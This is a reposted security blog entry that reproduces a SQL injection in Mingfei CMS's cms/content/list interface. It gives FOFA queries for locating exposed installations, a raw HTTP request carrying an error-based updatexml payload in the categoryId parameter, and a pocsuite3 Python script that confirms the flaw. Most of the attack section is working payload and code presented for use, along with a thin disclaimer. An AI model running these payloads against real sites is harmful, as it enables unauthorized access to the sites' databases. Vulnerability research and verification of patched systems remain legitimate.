Vulnerability recurrence - Mingfei CMS cmscontentlist interface SQL injection (with vulnerability detection script)

Internet 2023-12-27 21:30:20 views: null

Disclaimer

The vulnerabilities involved in the article have been fixed, and sensitive information has been coded. The article is only for experience sharing . Do not take it seriously. Unauthorized attacks are illegal! Sensitive information in the article has been processed at multiple levels. The user shall be responsible for any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this article. The author does not bear any responsibility for this. Please be responsible for any consequences.

Vulnerability description

SQL injection exists in Mingfei CMS cms/content/list interface

fofa statement

body="铭飞MCMS" || body="/mdiy/formData/save.do" || body="static/plugins/ms/1.0.0/ms.js"

POC plus detection

GET /cms/content/list?categoryId=1%27%20and%20updatexml(1,concat(0x7e,md5(123),0x7e),1)%20and%20%271 HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=790AEA19293AEF86BC2199B2A435A8B8

poc script

pocsuite framework for scripts

# _*_ coding:utf-8 _*_
# @Time : 2023/12/23
# @Author: 炼金术师诸葛亮
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str

class mingfei_list_sql(POCBase):
    pocDesc = '''铭飞CMS cms/content/list接口SQL注入'''
    author = '炼金术师诸葛亮'
    createDate = '2023-12-23'
    name = '铭飞CMS cms/content/list接口SQL注入漏洞'



    def _verify(self):

        result = {}
        url = self.url+ '/cms/content/list?categoryId=1%27%20and%20updatexml(1,concat(0x7e,md5(123),0x7e),1)%20and%20%271'
        headers = {
            "User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)",
            "Accept": "*/*",
            'Connection': 'Keep-Alive'
        }
        try:


            response = requests.get(url, headers=headers)
            if response.status_code == 200 and '202cb962ac5' in response.text:
                result['VerifyInfo'] = {}


            return self.parse_output(result)
        except Exception as e:
            pass

register_poc(mingfei_list_sql)

Script exploit

Guess you like

Origin blog.csdn.net/jjjj1029056414/article/details/135169405
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com